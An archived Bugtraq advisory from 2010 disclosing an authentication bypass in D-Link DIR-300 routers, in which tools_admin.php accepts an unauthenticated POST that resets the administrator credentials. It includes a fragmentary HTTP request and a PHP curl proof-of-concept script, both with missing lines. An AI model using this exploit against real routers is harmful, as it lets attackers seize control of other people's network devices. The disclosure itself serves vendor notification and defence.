Home page logo

bugtraq logo Bugtraq mailing list archives

D-Link DIR-300 authentication bypass
From: Karol Celiński <karol () celin pl>
Date: Tue, 9 Nov 2010 10:05:12 +0100

Hello, I found security bug in D-Link DIR-300 wireless router. It can
be used to bypass authentication mechanizm by attacker with access to
web interface. I reported it to D-Link but they are not replying for
my emails. According to other D-Link security holes and their status I
think that they won't reply, so I decided to write about it here.

[Technical details]

Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any
authorization by sending specially crafted http post request such as:

---cut here---
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

---cut here---

If attacker makes this request to the control panel, the
administrator username is set to admin with password ,,uhOHahEh".


- All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05).
- There is possibility that other dlink devices which use the same php
scripts in control panel are affected. I'm not able to check it
because I don't have devices for tests. I'm counting on you ;->


---cut here---
        if(sizeof($argv)!=4) {
                echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
        curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php";);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_PORT, $argv[2]);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
        echo "+ starting request\n";
        $out = curl_exec($ch);
        if($out===false) {
                echo "- Error: could not connect (
        } else
                echo "+ request sended\n";
        if(stripos($out,"Successfully")===false) {
                echo "- something goes wrong (check answer - answer.html) !\n";
                $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
                echo "+ ok, now you can login using l: admin p:$argv[3]\n";
---cut here---


 - Information sent to vendor 07.08.2010
 - No response
 - Information resended to vendor 07.31.2010
 - No response from vendor

Karol Celiński ( Celin )
Pentester/Researcher @ Safe Computing


karol at celin dot pl

Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]